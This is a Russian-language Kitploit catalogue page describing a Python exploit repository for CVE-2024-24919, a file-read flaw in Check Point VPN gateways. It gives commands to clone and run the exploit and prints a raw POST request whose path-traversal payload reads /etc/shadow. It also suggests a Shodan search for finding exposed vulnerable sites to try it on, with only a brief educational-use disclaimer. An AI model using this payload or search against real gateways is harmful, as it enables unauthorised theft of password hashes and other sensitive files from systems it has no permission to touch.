Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-24919-Exploit — CVE-2024-24919 Exploit and PoC - Critical LFI for Remote Access VPN or Mobile Access. | Kitploit
Инструменты/GitHubGitHub/rug4lo/cve-2024-24919-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubrug4lo/cve-2024-24919-exploit

CVE-2024-24919-Exploit

CVE-2024-24919 Exploit and PoC - Critical LFI for Remote Access VPN or Mobile Access.

Репозиторий
32 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-24919-Exploit

Обзор

Этот репозиторий содержит эксплойт на Python для уязвимости CVE-2024-24919, которая позволяет читать конфиденциальные файлы с уязвимой страницы.

Эксплойт сначала проверяет, уязвима ли цель, а затем получает путь, который вы укажете.

Серьёзность: Критическая

Использование

Сначала клонируйте репозиторий:

root@kitploit:~
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit

Дайте права и выполните эксплойт с помощью python3

root@kitploit:~
chmod +x exploit.py
python3 exploit.py

Затем следуйте шагам, и вы получите данные указанного файла.

Если у вас возникли трудности, убедитесь, что указанный URL является основным

✓ https://google.com

✘ https://google.com/search?client=firefox

POC (Proof Of Concept)

Сначала нам нужно убедиться, что на сайте включены Check Point Security Gateways с удалённым доступом VPN или мобильным доступом.

В этом эксплойте мы обращаемся к конечной точке {ip}/clients/MyCRL.

Эта конечная точка уязвима, если мы отправляем POST-запрос, добавляем строку CSHELL/ и путь к файлу, который хотим прочитать, используя Path Traversal.

Запрос будет выглядеть примерно так:

root@kitploit:~
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

Всё это мы получили, изучив исходный код.

Для получения дополнительной информации о процессе смотрите этот пост --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/

Тестирование

Если вы хотите протестировать эту уязвимость, вы можете использовать Sodan для поиска уязвимых сайтов, используя этот запрос в Sodan

root@kitploit:~
Server: “Check Point SVN Foundation”

Ссылки

https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919

Отказ от ответственности

Этот скрипт предназначен только для образовательных целей. Используйте его ответственно и только на системах, на которые у вас есть разрешение на доступ.

Скачать инструмент